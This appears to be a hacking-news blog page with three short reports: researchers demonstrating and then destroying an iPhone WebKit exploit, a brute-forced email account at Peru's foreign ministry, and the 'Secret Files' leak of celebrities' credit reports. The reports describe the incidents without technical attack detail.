"It took about three weeks, starting from scratch, and we were only working on our private time," says Joost Pol, CEO of Certified Secure, a nine-person research outfit based in The Hague. Pol and his colleague Daan Keuper used code auditing techniques to ferret out the WebKit bug and then spent most of the three weeks chaining multiple clever techniques to get a "clean, working exploit." "We really wanted to see how much time it would take a motivated attacker to do a clean attack against your iPhone. For me, that was the motivation. The easy part was finding the WebKit zero-day," Pol said in an interview. Once the vulnerability in WebKit was found, the hackers said they put many things together in about three weeks to write an exploit to hack the iPhone 4S. The two found that the exploit they developed also worked for iOS 6 (released today) and all previous versions of iOS devices.
Although the successful attack exposed the entire address book, photo/video database and browsing history, Pol and Keuper said they did not have access to the SMS or e-mail database. "Those are not accessible and they're also encrypted," Keuper explained.
While Pol and Keuper could use the hack for harm, the two said the exploit has already been destroyed. Pol said: “We shredded it from our machine. The story ends here, we’re not going to use this again. It’s time to look for a new challenge.” They further added that iOS is definitely the most secure mobile platform around thanks to Apple’s strict guidelines.








Silvia Alfaro -Peruvian Ambassador of Bolivia Email-id Hacked By Spect


Hackers targeted the official website of the Ministry of Foreign Affairs of Peru. A hacker codenamed "Spect", who belongs to a newly formed hacker group named "T3am_Digi7al Revolution", took responsibility for hacking into the web-mail of Peru's Ministry of Foreign Affairs. The hacker said that he managed to brute-force the Ambassador of Bolivia's official email account and was able to dump all of the emails. Proof of hack submitted by the hacker:-


The above screenshots clearly indicate that the hacker indeed penetrated the security and managed to gain access. T3am_Digi7al Revolution also submitted several login details, but due to privacy and security concerns we are not exposing those credentials. On the subject of mail hacks, we would like to remind you that a couple of months ago Anonymous hacked into Syrian President Bashar Assad's email account and exposed all the details. Also, a few weeks ago another hacktivist group named Teamgreyhat hacked into the email account of the Bangladesh Prime Minister. The last and major email hack was carried out by Anonymous, and the victim was Tunisia's ruling Ennahda party, including emails of the prime minister.


 


'The Secret Files'- Hackers Exposed Personal Details of Celebrities, Public Figure, FBI Director & National Leaders


Yet again celebrities have fallen victim to a cyber attack; this time it is not nude photos but confidential personal information. Renowned public figures, national leaders and celebrities such as Kim Kardashian, US Vice President Joe Biden, Hillary Clinton, Mel Gibson, Michelle Obama, Ashton Kutcher, Jay Z, Beyoncé, Paris Hilton, Britney Spears, Sarah Palin, Hulk Hogan, Donald Trump and Arnold Schwarzenegger together became prey. The list does not end here: the hacker caught two more big fish in his net, the head of the Los Angeles police force Charlie Beck and FBI Director Robert Mueller. Many of you might be astonished at how such big public figures, including the Vice President and the FBI Director, became victims in a single round of cyber attack! Let me tell you what exactly happened: the hacked data, dubbed "The Secret Files" by the hackers, contains personal information and credit reports (including social security numbers, details of their mortgages, addresses, and credit card and banking details) and was made public by those hackers on a new website, as shown in the picture below.

The hacker left a message, or in other words a satire, saying "The Secret Files - If you believe that God makes miracles, you have to wonder if Satan has a few up his sleeve." Such a hack, where a number of big fish get caught, is very rare. The nature of this hack can be categorized as clear identity theft. But the question is how? The answer is that some of the United States' top credit bureaus have come forward and acknowledged that fraudulent and unauthorized access to the records of well-known figures has taken place. Most of the reports were apparently obtained from one of the three major U.S. credit ratings agencies (Equifax, TransUnion and Experian) via a special Internet portal they maintain for the public to check their own credit ratings. All three companies have said that some of their reports had been fraudulently accessed since Monday by someone using personal data about the victims. Security experts said that suggests the attack is a “social hack” rather than a classic cyber security data breach.


-Source (Sophos & WT)



